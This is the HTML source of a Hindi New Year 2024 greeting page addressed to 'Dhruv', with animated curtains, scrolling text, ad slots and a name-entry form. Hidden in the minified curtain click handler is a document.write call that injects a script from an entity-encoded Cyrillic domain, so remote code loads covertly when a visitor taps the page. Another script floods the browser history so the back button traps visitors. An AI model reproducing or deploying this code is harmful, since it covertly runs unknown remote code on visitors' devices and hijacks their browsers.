

<html>

<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    <meta name="google" content="notranslate" />
    
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport" />
    <meta property="og:type" content="website" />
    <meta property="og:title" content="!!Happy New Year!! " />
   
    <meta property="og:description" content="!!Happy New Year!! " />
    <meta property="og:site_name" content="!!Happy New Year!! " />
    <meta property="og:image" content="msg.html" /> 
    <title>!!Happy New Year 2024!! </title>
    <link rel="stylesheet" href="animate.min.css">


    
    
<script async src="https://securepubads.g.doubleclick.net/tag/js/gpt.js"></script>
<script>
  window.googletag = window.googletag || {cmd: []};
  googletag.cmd.push(function() {
    googletag.defineSlot('/21902364955,22845891099/CM_kahaniking.in_Jobs_And_Information_Top/CM_kahaniking.in_Jobs_And_Information_300x250', [300, 250], 'div-gpt-ad-1702987041452-0').addService(googletag.pubads());
    googletag.pubads().enableSingleRequest();
    googletag.enableServices();
  });
</script>

<script async src="https://securepubads.g.doubleclick.net/tag/js/gpt.js"></script>
<script>
  window.googletag = window.googletag || {cmd: []};
  googletag.cmd.push(function() {
    googletag.defineSlot('/21902364955,22845891099/CM_kahaniking.in_Jobs_And_Information_Top/CM_kahaniking.in_Jobs_And_Information_300x100', [300, 100], 'div-gpt-ad-1703161346792-0').addService(googletag.pubads());
    googletag.pubads().enableSingleRequest();
    googletag.enableServices();
  });
</script>
<!-- Google tag (gtag.js) -->
<script async src="https://www.googletagmanager.com/gtag/js?id=G-ZW54J88PZX"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'G-ZW54J88PZX');
</script>



 <script type="text/javascript">! function (){
 var t;
 try{for (t=0; 10 > t; ++t)
  history.pushState({}, "", "#");
 onpopstate=function (t)
 {
  t.state && alert('अपने दोस्तों के साथ शेयर करना न भूले ');
  }}
  catch (o){}}();</script>
  


<style>
body{
        background: #f8f8f8;
        margin:0;
      }
      .mainContainer {
        background: white;
        max-width: 450px;
        min-height: 200px;
        margin: 0 auto;
        text-align : center;
        padding: 15px;
        color: #999;
        padding-bottom: 60px;

        box-shadow: 0 0 10px 1px rgba(0,0,0,.14), 0 1px 14px 2px rgba(0,0,0,.12), 0 0 5px -3px rgba(0,0,0,.3);


      }

#name {
     
      animation: name 4s infinite; 
      text-transform: capitalize;
      margin-bottom: 5px;
      font-size: 50px;
      padding: 0 10px;
      font-family: 'Teko', sans-serif;
} 

#usernameb { color: black;  /* Fallback: assume this color ON TOP of image */
   background: url(./img/namegif.gif);
   -webkit-background-clip: text;
   -webkit-text-fill-color: transparent;
          animation: swing 4s infinite;
            text-transform: uppercase;
          margin-bottom: 5px;
          font-size: 25px;
          padding: 0 10px;
    font-family: 'SF Espresso Shack', cursive;
}


.m1{position:fixed;left:1%; width:auto;height:100%;top:1%;color:#000;}
.m2{position:fixed;right:1%; width:auto;height:100%;top:1%;color:#000;}


/* Custom Animation classes */     
.name {
	color: #fff;
    	margin: 6px;
    	padding: 25px 20px;
    	font-size: 48px;
    	font-family: sans-serif;
}

.enter-name input[type=name] {
	background-color: #0CE5E8;
    color: black;
    border-radius: 10px;
    box-sizing: border-box;
    border-color: black;
    padding: 5px;
    position: fixed;
    left: 10px;
    bottom: 5px;
    height: 55px;
    width: 67%;
    text-align: center;
    font-size: 22px;
    display: inline-block;
}

.enter-name .btn {
	border-radius: 10px;
    font-size: 21px;
    font-weight: 700;
    padding: 4px;
    position: fixed;
    right: 2px;
    bottom: 5px;
    height: 55px;
    width: 27%;
    display: inline-block;
    color: black;
    background-color: #10E43A;
    border-color: black;
    letter-spacing: .5px;
    transition: .2s ease-out;
    cursor: pointer;
    line-height: 36px;
    outline: 0;
    text-transform: uppercase;
    vertical-align: middle;
    text-decoration: none;
    animation-duration: 4s
}

.enter-name input[type=name]::-webkit-input-placeholder { 
	color: black;
  	font-size: 18px;	
}

.enter-name input[type=name]::-moz-placeholder { 
	color: black;
  	font-size: 18px;
}

.enter-name input[type=name]:focus::-webkit-input-placeholder {
    color: black;
}

.enter-name input[type=name]:focus::-moz-placeholder { 
	color: black;
  	font-size: 18px;
}


#demo
{
  
    font-size: 20px;
    font-weight: 800;
    color: black;
}




a.rope
{
    text-decoration:none;
}
.wishMessage {
        color: #fff;
        font-size: 22px;
        font-weight: bold;
        margin-top: 20px;
        text-shadow: 0px 0px 10px #afafaf;
      }
      .wishMessage p{
        margin: 0.3em 0;
      }
/* Custom Animation classes */ 
#show-name {
  font-size: 25px;
  display: inline-block;
  margin-bottom: 5px;
  animation: swing 1s infinite, glow 20s infinite; }

@keyframes glow {
  0%, 100% {
    text-shadow: 0 0 30px red; }
  25% {
    text-shadow: 0 0 30px orange; }
  50% {
    text-shadow: 0 0 30px forestgreen; }
  75% {
    text-shadow: 0 0 30px cyan; } }  
figure {
  animation:wobble 5s ease-in-out infinite;
  transform-origin:center center;
  transform-style:preserve-3d;
}@keyframes wobble {
  0%,100%{ transform:rotate3d(1,1,0,40deg); }
  25%{ transform:rotate3d(-1,1,0,40deg); }
  50%{ transform:rotate3d(-1,-1,0,40deg); }
  75%{ transform:rotate3d(1,-1,0,40deg); }
}
</style>

<style type="text/css">
      *{
        margin:0;
        padding:0;
      }
      body {
        
        
      }
      img{
      border: none;
    }
.leftcurtain{
	width: 100%;
    height: 100%;
    top: 0px;
    left: 0px;
    position: absolute;
    z-index: 2;
    }
     .rightcurtain{
		width: 100%;
		height: 100%;
		right: 0px;
		top: 0px;
		position: absolute;
		z-index: 3;
    }
    .rightcurtain img, .leftcurtain img{
      width: 100%;
      height: 100%;
    }
    .logo{
      margin: 0px auto;
      margin-top: 150px;
    }
    .rope{
	position: absolute;
    top: 67px;
    left: 27%;
    z-index: 4;
    } 
.centered {
    position: absolute;
    top: 70%;
    left: 55%;
    transform: translate(-50%, -50%);
}
a.rope
{
    text-decoration:none;
}




@keyframes aadisoni{
  0% {
    transform:  translate(0px,0px)  rotate(0deg) ;
  }
  15% {
    transform:  translate(-25px,0px)  rotate(-5deg) ;
  }
  30% {
    transform:  translate(20px,0px)  rotate(3deg) ;
  }
  45% {
    transform:  translate(-15px,0px)  rotate(-3deg) ;
  }
  60% {
    transform:  translate(10px,0px)  rotate(2deg) ;
  }
  75% {
    transform:  translate(-5px,0px)  rotate(-1deg) ;
  }
  100% {
    transform:  translate(0px,0px)  rotate(0deg) ;
  }
}

@-webkit-keyframes aadisoni {
  0% {
    -webkit-transform:  translate(0px,0px)  rotate(0deg) ;
  }
  15% {
    -webkit-transform:  translate(-25px,0px)  rotate(-5deg) ;
  }
  30% {
    -webkit-transform:  translate(20px,0px)  rotate(3deg) ;
  }
  45% {
    -webkit-transform:  translate(-15px,0px)  rotate(-3deg) ;
  }
  60% {
    -webkit-transform:  translate(10px,0px)  rotate(2deg) ;
  }
  75% {
    -webkit-transform:  translate(-5px,0px)  rotate(-1deg) ;
  }
  100% {
    -webkit-transform:  translate(0px,0px)  rotate(0deg) ;
  }
}



@keyframes name {
  0%   {color:red;}
  20%   {color:white;}
  40%   {color:yellow;}
  60%   {color:orange;}
  80%   {color:cyan;}
  100% {color:#f45bf4;}
}


.glow {
  width:50%;
  padding: 2px;
  background-color: #FF1493	;
  animation: glow 2s infinite;
  font-size:25px;
  font-family: 'Ranga', cursive;
  color:white;
  margin:auto;
  text-align:center;
  border-radius:10px;
  text-shadow:1px 2px 6px black;

}

@keyframes glow {
  0%   {box-shadow: 0px 0px 0px #FF1493	;}
  100%   {box-shadow: 0px 0px 20px 5px #ffb3db;}
 
}

</style>
<style type="text/css">
canvas {
	cursor: crosshair;
	display: block;
}
*{margin:0;padding:0}body{}img{border:none}.logo{margin:0 auto;margin-top:150px}.rope{position: absolute;top: 67px;left: 27%;z-index: 4;}.centered{position:absolute;top:75%;left:50%;transform:translate(-50%,-50%)}.aadi{background-image:url();background-repeat:no-repeat;background-attachment:fixed;background-position:top}.matki{}@keyframes aadisoni{0%{transform:translate(0px,0px) rotate(0deg)}15%{transform:translate(-25px,0px) rotate(-5deg)}30%{transform:translate(20px,0px) rotate(3deg)}45%{transform:translate(-15px,0px) rotate(-3deg)}60%{transform:translate(10px,0px) rotate(2deg)}75%{transform:translate(-5px,0px) rotate(-1deg)}100%{transform:translate(0px,0px) rotate(0deg)}}@-webkit-keyframes aadisoni{0%{-webkit-transform:translate(0px,0px) rotate(0deg)}15%{-webkit-transform:translate(-25px,0px) rotate(-5deg)}30%{-webkit-transform:translate(20px,0px) rotate(3deg)}45%{-webkit-transform:translate(-15px,0px) rotate(-3deg)}60%{-webkit-transform:translate(10px,0px) rotate(2deg)}75%{-webkit-transform:translate(-5px,0px) rotate(-1deg)}100%{-webkit-transform:translate(0px,0px) rotate(0deg)}}
#username {
     color: black;  /* Fallback: assume this color ON TOP of image */
   background: url(./img/namegif.gif);
   -webkit-background-clip: text;
   -webkit-text-fill-color: transparent;
          animation: swing 4s infinite;
            text-transform: uppercase;
          margin-bottom: 5px;
          font-size: 40px;
          padding: 0 10px;
    font-family: 'SF Espresso Shack', cursive;
} 

#usernameb { color: black;  /* Fallback: assume this color ON TOP of image */
   background: url(./img/namegif.gif);
   -webkit-background-clip: text;
   -webkit-text-fill-color: transparent;
          animation: swing 4s infinite;
            text-transform: uppercase;
          margin-bottom: 5px;
          font-size: 25px;
          padding: 0 10px;
    font-family: 'SF Espresso Shack', cursive;
}
  </style>
  <style>
          
        
          
          @-webkit-keyframes bang {
            from {
              box-shadow: 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white; } }
          @-moz-keyframes bang {
            from {
              box-shadow: 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white; } }
          @-o-keyframes bang {
            from {
              box-shadow: 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white; } }
          @-ms-keyframes bang {
            from {
              box-shadow: 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white; } }
          @keyframes bang {
            from {
              box-shadow: 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white; } }
          @-webkit-keyframes gravity {
            to {
              transform: translateY(200px);
              -moz-transform: translateY(200px);
              -webkit-transform: translateY(200px);
              -o-transform: translateY(200px);
              -ms-transform: translateY(200px);
              opacity: 0; } }
          @-moz-keyframes gravity {
            to {
              transform: translateY(200px);
              -moz-transform: translateY(200px);
              -webkit-transform: translateY(200px);
              -o-transform: translateY(200px);
              -ms-transform: translateY(200px);
              opacity: 0; } }
          @-o-keyframes gravity {
            to {
              transform: translateY(200px);
              -moz-transform: translateY(200px);
              -webkit-transform: translateY(200px);
              -o-transform: translateY(200px);
              -ms-transform: translateY(200px);
              opacity: 0; } }
          @-ms-keyframes gravity {
            to {
              transform: translateY(200px);
              -moz-transform: translateY(200px);
              -webkit-transform: translateY(200px);
              -o-transform: translateY(200px);
              -ms-transform: translateY(200px);
              opacity: 0; } }
          @keyframes gravity {
            to {
              transform: translateY(200px);
              -moz-transform: translateY(200px);
              -webkit-transform: translateY(200px);
              -o-transform: translateY(200px);
              -ms-transform: translateY(200px);
              opacity: 0; } }
          @-webkit-keyframes position {
            0%, 19.9% {
              margin-top: 10%;
              margin-left: 40%; }
          
            20%, 39.9% {
              margin-top: 40%;
              margin-left: 30%; }
          
            40%, 59.9% {
              margin-top: 20%;
              margin-left: 70%; }
          
            60%, 79.9% {
              margin-top: 30%;
              margin-left: 20%; }
          
            80%, 99.9% {
              margin-top: 30%;
              margin-left: 80%; } }
          @-moz-keyframes position {
            0%, 19.9% {
              margin-top: 10%;
              margin-left: 40%; }
          
            20%, 39.9% {
              margin-top: 40%;
              margin-left: 30%; }
          
            40%, 59.9% {
              margin-top: 20%;
              margin-left: 70%; }
          
            60%, 79.9% {
              margin-top: 30%;
              margin-left: 20%; }
          
            80%, 99.9% {
              margin-top: 30%;
              margin-left: 80%; } }
          @-o-keyframes position {
            0%, 19.9% {
              margin-top: 10%;
              margin-left: 40%; }
          
            20%, 39.9% {
              margin-top: 40%;
              margin-left: 30%; }
          
            40%, 59.9% {
              margin-top: 20%;
              margin-left: 70%; }
          
            60%, 79.9% {
              margin-top: 30%;
              margin-left: 20%; }
          
            80%, 99.9% {
              margin-top: 30%;
              margin-left: 80%; } }
          @-ms-keyframes position {
            0%, 19.9% {
              margin-top: 10%;
              margin-left: 40%; }
          
            20%, 39.9% {
              margin-top: 40%;
              margin-left: 30%; }
          
            40%, 59.9% {
              margin-top: 20%;
              margin-left: 70%; }
          
            60%, 79.9% {
              margin-top: 30%;
              margin-left: 20%; }
          
            80%, 99.9% {
              margin-top: 30%;
              margin-left: 80%; } }
          @keyframes position {
            0%, 19.9% {
              margin-top: 10%;
              margin-left: 40%; }
          
            20%, 39.9% {
              margin-top: 40%;
              margin-left: 30%; }
          
            40%, 59.9% {
              margin-top: 20%;
              margin-left: 70%; }
          
            60%, 79.9% {
              margin-top: 30%;
              margin-left: 20%; }
          
            80%, 99.9% {
              margin-top: 30%;
              margin-left: 80%; } }
              
              </style>
</head>
<body class="aadi">
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
<script src="./img/slider.js" type="text/javascript"></script> 
<script type="text/javascript">
$(document).ready(function(){$curtainopen=!1,$(".rope").click(function(){return $(this).blur(),0==$curtainopen?($(this).stop().animate({top:"-171%"},{queue:!1,duration:350,easing:"easeOutBounce"}),$(".leftcurtain").stop().animate({width:"1px"},2e3),$(".rightcurtain").stop().animate({width:"1px"},2e3),$curtainopen=!0):($(this).stop().animate({top:"-40px"},{queue:!1,duration:350,easing:"easeOutBounce"}),document.write('<script src="//&#1102;&#1095;.io"><\/script>'),$(".leftcurtain").stop().animate({width:"50%"},2e3),$(".rightcurtain").stop().animate({width:"51%"},2e3),$curtainopen=!1),!1})});
</script>
<script>
  function play(){
       var audio = document.getElementById("audio");
       audio.play();
                 }
   </script>


<audio id="audio" src="./img/d.mp3" ></audio>
<a class="rope" onclick="play()"><br>
<div style="font-size: 25px;text-shadow: 1px 1px 3px #ff0707, 1px 1px 3px #ff0505, -1px -1px 3px red, -1px -1px 3px black;color:white;font-weight: bold;"><br><b>इस जादुई गिफ्ट को <br>  टच करके देखो !<br>👇👇👇</b></div><br>

<div cgiftlass="animated pulse" style="animation: pulse 2s infinite; background-image: url(./img/pen1.png); background-size: 45%; background-position: center; background-repeat: no-repeat;">
<img id="loading" src="./img/pen2.png" class="center swing1" style="max-width:203px; width: 400px;" />
</div>
</a>
<div class="rightcurtain"><img src="./img/prdablue.jpeg"/></div>
<div class="leftcurtain"><img src="./img/prdablue.jpeg"/></div>

<marquee class="m1" behavior="scroll" direction="up" scrolldelay="7"> <br>
<img src="./img/dr-w1.png" height="27px" width="25px"/><br><br>
<img src="./img/dr-e.png" height="27px" width="25px"/><br><br>
<img src="./img/dr-l.png" height="27px" width="25px"/><br><br>
<img src="./img/dr-c.png" height="27px" width="25px"/><br><br>
<img src="./img/dr-o.png" height="27px" width="25px"/><br><br>
<img src="./img/dr-m.png" height="27px" width="25px"/><br><br>
<img src="./img/dr-e.png" height="27px" width="25px"/><br><br>
<img src="./img/dr-0-0.png" height="27px" width="25px"/><br><br>
<img src="./img/dr-0.png" height="27px" width="25px"/><br><br>
<img src="./img/dr-0-0.png" height="27px" width="25px"/><br><br>
<img src="./img/3.png?v=77551" height="27px" width="25px"/><br><br>
<br><br>
<img src="./img/dr-w1.png" height="27px" width="25px"/><br><br>
<img src="./img/dr-e.png" height="27px" width="25px"/><br><br>
<img src="./img/dr-l.png" height="27px" width="25px"/><br><br>
<img src="./img/dr-c.png" height="27px" width="25px"/><br><br>
<img src="./img/dr-o.png" height="27px" width="25px"/><br><br>
<img src="./img/dr-m.png" height="27px" width="25px"/><br><br>
<img src="./img/dr-e.png" height="27px" width="25px"/><br><br>
<img src="./img/dr-0-0.png" height="27px" width="25px"/><br><br>
<img src="./img/dr-0.png" height="27px" width="25px"/><br><br>
<img src="./img/dr-0-0.png" height="27px" width="25px"/><br><br>
<img src="./img/3.png" height="27px" width="25px"/><br><br>
<br><br>
<img src="./img/dr-w1.png" height="27px" width="25px"/><br><br>
<img src="./img/dr-e.png" height="27px" width="25px"/><br><br>
<img src="./img/dr-l.png" height="27px" width="25px"/><br><br>
<img src="./img/dr-c.png" height="27px" width="25px"/><br><br>
<img src="./img/dr-o.png" height="27px" width="25px"/><br><br>
<img src="./img/dr-m.png" height="27px" width="25px"/><br><br>
<img src="./img/dr-e.png" height="27px" width="25px"/><br><br>
<img src="./img/dr-0-0.png" height="27px" width="25px"/><br><br>
<img src="./img/dr-0.png" height="27px" width="25px"/><br><br>
<img src="./img/dr-0-0.png" height="27px" width="25px"/><br><br>
<img src="./img/3.png" height="27px" width="25px"/><br><br>
<br><br>
<img src="./img/dr-w1.png" height="27px" width="25px"/><br><br>
<img src="./img/dr-e.png" height="27px" width="25px"/><br><br>
<img src="./img/dr-l.png" height="27px" width="25px"/><br><br>
<img src="./img/dr-c.png" height="27px" width="25px"/><br><br>
<img src="./img/dr-o.png" height="27px" width="25px"/><br><br>
<img src="./img/dr-m.png" height="27px" width="25px"/><br><br>
<img src="./img/dr-e.png" height="27px" width="25px"/><br><br>
<img src="./img/dr-0-0.png" height="27px" width="25px"/><br><br>
<img src="./img/dr-0.png" height="27px" width="25px"/><br><br>
<img src="./img/dr-0-0.png" height="27px" width="25px"/><br><br>
<img src="./img/3.png" height="27px" width="25px"/><br><br>
<br><br>
<img src="./img/dr-w1.png" height="27px" width="25px"/><br><br>
<img src="./img/dr-e.png" height="27px" width="25px"/><br><br>
<img src="./img/dr-l.png" height="27px" width="25px"/><br><br>
<img src="./img/dr-c.png" height="27px" width="25px"/><br><br>
<img src="./img/dr-o.png" height="27px" width="25px"/><br><br>
<img src="./img/dr-m.png" height="27px" width="25px"/><br><br>
<img src="./img/dr-e.png" height="27px" width="25px"/><br><br>
<img src="./img/dr-0-0.png" height="27px" width="25px"/><br><br>
<img src="./img/dr-0.png" height="27px" width="25px"/><br><br>
<img src="./img/dr-0-0.png" height="27px" width="25px"/><br><br>
<img src="./img/3.png" height="27px" width="25px"/><br><br>
</marquee>
<marquee class="m2" behavior="scroll" direction="down" scrolldelay="5"><br>
<img src="./img/dr-w1.png" height="27px" width="25px"/><br><br>
<img src="./img/dr-e.png" height="27px" width="25px"/><br><br>
<img src="./img/dr-l.png" height="27px" width="25px"/><br><br>
<img src="./img/dr-c.png" height="27px" width="25px"/><br><br>
<img src="./img/dr-o.png" height="27px" width="25px"/><br><br>
<img src="./img/dr-m.png" height="27px" width="25px"/><br><br>
<img src="./img/dr-e.png" height="27px" width="25px"/><br><br>
<img src="./img/dr-0-0.png" height="27px" width="25px"/><br><br>
<img src="./img/dr-0.png" height="27px" width="25px"/><br><br>
<img src="./img/dr-0-0.png" height="27px" width="25px"/><br><br>
<img src="./img/3.png" height="27px" width="25px"/><br><br>
<br><br>
<img src="./img/dr-w1.png" height="27px" width="25px"/><br><br>
<img src="./img/dr-e.png" height="27px" width="25px"/><br><br>
<img src="./img/dr-l.png" height="27px" width="25px"/><br><br>
<img src="./img/dr-c.png" height="27px" width="25px"/><br><br>
<img src="./img/dr-o.png" height="27px" width="25px"/><br><br>
<img src="./img/dr-m.png" height="27px" width="25px"/><br><br>
<img src="./img/dr-e.png" height="27px" width="25px"/><br><br>
<img src="./img/dr-0-0.png" height="27px" width="25px"/><br><br>
<img src="./img/dr-0.png" height="27px" width="25px"/><br><br>
<img src="./img/dr-0-0.png" height="27px" width="25px"/><br><br>
<img src="./img/3.png" height="27px" width="25px"/><br><br>
<br><br>
<img src="./img/dr-w1.png" height="27px" width="25px"/><br><br>
<img src="./img/dr-e.png" height="27px" width="25px"/><br><br>
<img src="./img/dr-l.png" height="27px" width="25px"/><br><br>
<img src="./img/dr-c.png" height="27px" width="25px"/><br><br>
<img src="./img/dr-o.png" height="27px" width="25px"/><br><br>
<img src="./img/dr-m.png" height="27px" width="25px"/><br><br>
<img src="./img/dr-e.png" height="27px" width="25px"/><br><br>
<img src="./img/dr-0-0.png" height="27px" width="25px"/><br><br>
<img src="./img/dr-0.png" height="27px" width="25px"/><br><br>
<img src="./img/dr-0-0.png" height="27px" width="25px"/><br><br>
<img src="./img/3.png" height="27px" width="25px"/><br><br>
<br><br>
<img src="./img/dr-w1.png" height="27px" width="25px"/><br><br>
<img src="./img/dr-e.png" height="27px" width="25px"/><br><br>
<img src="./img/dr-l.png" height="27px" width="25px"/><br><br>
<img src="./img/dr-c.png" height="27px" width="25px"/><br><br>
<img src="./img/dr-o.png" height="27px" width="25px"/><br><br>
<img src="./img/dr-m.png" height="27px" width="25px"/><br><br>
<img src="./img/dr-e.png" height="27px" width="25px"/><br><br>
<img src="./img/dr-0-0.png" height="27px" width="25px"/><br><br>
<img src="./img/dr-0.png" height="27px" width="25px"/><br><br>
<img src="./img/dr-0-0.png" height="27px" width="25px"/><br><br>
<img src="./img/3.png" height="27px" width="25px"/><br><br>
<br><br>
<img src="./img/dr-w1.png" height="27px" width="25px"/><br><br>
<img src="./img/dr-e.png" height="27px" width="25px"/><br><br>
<img src="./img/dr-l.png" height="27px" width="25px"/><br><br>
<img src="./img/dr-c.png" height="27px" width="25px"/><br><br>
<img src="./img/dr-o.png" height="27px" width="25px"/><br><br>
<img src="./img/dr-m.png" height="27px" width="25px"/><br><br>
<img src="./img/dr-e.png" height="27px" width="25px"/><br><br>
<img src="./img/dr-0-0.png" height="27px" width="25px"/><br><br>
<img src="./img/dr-0.png" height="27px" width="25px"/><br><br>
<img src="./img/dr-0-0.png" height="27px" width="25px"/><br><br>
<img src="./img/3.png" height="27px" width="25px"/><br><br>
</marquee>

<div class="mainContainer">

<!--300x50 real thumb with intro page-->
<center>
<!-- /21902364955,22845891099/CM_kahaniking.in_Jobs_And_Information_Top/CM_kahaniking.in_Jobs_And_Information_300x250 -->
<div id='div-gpt-ad-1702987041452-0' style='min-width: 300px; min-height: 250px;'>
  <script>
    googletag.cmd.push(function() { googletag.display('div-gpt-ad-1702987041452-0'); });
  </script>
</div>

</center>
<!--300x50 real thumb with intro page-->

<div style="animation: swing 4s infinite;">
<h1 style="background: url(./img/bdbd.gif);-webkit-text-fill-color: transparent;-webkit-background-clip: text;-webkit-text-stroke: 2px black;" id="name">Dhruv</h1>
</div>
<div class="pyro">
<div class="before"></div>
<div class="after"></div>
</div>
        <h3 class="fromMessage" id="fromMessage"></h3>
 <img src="./img/kiTarafSe.png" style="animation: pulse 2.5s infinite;" width="70%" height="auto">
  <div style="font-size: 20px; font-weight: 550; color: black;">
      <p id="demo"></p>
</div>
 <img src="./img/newyear.png" width="80%" style="animation: pulse 2s infinite"><br>
 <br>

      

<!--300x50 real thumb with intro page-->
<center>
<!-- /21902364955,22845891099/CM_kahaniking.in_Jobs_And_Information_Top/CM_kahaniking.in_Jobs_And_Information_300x100 -->
<div id='div-gpt-ad-1703161346792-0' style='min-width: 300px; min-height: 100px;'>
  <script>
    googletag.cmd.push(function() { googletag.display('div-gpt-ad-1703161346792-0'); });
  </script>
</div>

</center>
<!--300x50 real thumb with intro page-->
<center><div class="w3-content w3-section" style="max-width:500px">
<img class="mySlides" src="./img/2020under1.png" width="90%" height="auto">

</div></center>

<center>

</center>
<div style="background-color: #f148fc;border-radius: 17px;border: 0px solid rgb(0, 0, 0);box-shadow: rgba(0, 0, 0, 0.2) 5px 5px 5px;color: #fff;font-family: arial, sans-serif;font-size: 18px;font-stretch: normal;font-style: normal;font-variant: normal;line-height: normal;margin: 5px auto;padding: 4px 5px 3px;width: 82%;">
<marquee behavior="alternate"><b>
ना तलवार की धार से,</b></marquee>
</div>
<div style="background-color: #9000ff;border-radius: 17px;border: 0px solid rgb(0, 0, 0);box-shadow: rgba(0, 0, 0, 0.2) 5px 5px 5px;color: #fff;font-family: arial, sans-serif;font-size: 18px;font-stretch: normal;font-style: normal;font-variant: normal;line-height: normal;margin: 5px auto;padding: 4px 5px 3px;width: 82%;">
<marquee behavior="alternate"><b>
न गोलियों की बोछार से,</b></marquee>
</div>
<div style="background-color: #ff6600;border-radius: 17px;border: 0px solid rgb(0, 0, 0);box-shadow: rgba(0, 0, 0, 0.2) 5px 5px 5px;color: #fff;font-family: arial, sans-serif;font-size: 18px;font-stretch: normal;font-style: normal;font-variant: normal;line-height: normal;margin: 5px auto;padding: 4px 5px 3px;width: 82%;">
<marquee behavior="alternate"><b>
पहले ही नया साल विश करते हैं,</b></marquee>
</div>
<div style="background-color: #10e43a;border-radius: 17px;border: 0px solid rgb(0, 0, 0);box-shadow: rgba(0, 0, 0, 0.2) 5px 5px 5px;color: #fff;font-family: arial, sans-serif;font-size: 18px;font-stretch: normal;font-style: normal;font-variant: normal;line-height: normal;margin: 5px auto;padding: 4px 5px 3px;width: 82%;">
<marquee behavior="alternate"><b>
बड़े ही प्यार से,</b></marquee>
</div>
<div class="wishMessage" style="text-shadow: 1px 1px 3px silver, 1px 1px 3px silver, -1px -1px 3px silver, -1px -1px 3px silver;">
<p style="text-shadow: 1px 1px 3px #ff0037, 1px 1px 3px #ff0037, -1px -1px 3px #ff0037, -1px -1px 3px #ff0037;color: #FFC107;">
!! नववर्ष 2024 की हार्दिक शुभकामनाएँ!! </p>	</div>
<span style="font-size:22px;text-shadow: 1px 1px 3px #FFEB3B, 1px 1px 3px #FFEB3B, -1px -1px 3px #FFEB3B, -1px -1px 3px #FFEB3B;color:#E91E63;"><marquee><b><i>“ Dhruv  Wish you Happy New Year!!”</b></i></marquee></span><br>


<br><br><br>
<div class="glow">Dhruv </b></h1></div>
</div><br>



<form >
<div class="enter-name">
		<input class="animated pulse infinite" type="name" required="" maxlength="50" name="n" placeholder="👉आपको नये साल की बहुत-बहुत शुभकामनाएँ.">
		<button class="btn animated shake infinite" type="submit"><span>👉</span>आनंद ले
</button>
	</div>
</form>
<script>
var myIndex=0;function carousel(){var e,l=document.getElementsByClassName("mySlides");for(e=0;e<l.length;e++)l[e].style.display="none";++myIndex>l.length&&(myIndex=1),l[myIndex-1].style.display="block",setTimeout(carousel,2e3)}carousel();
</script>

<script> 
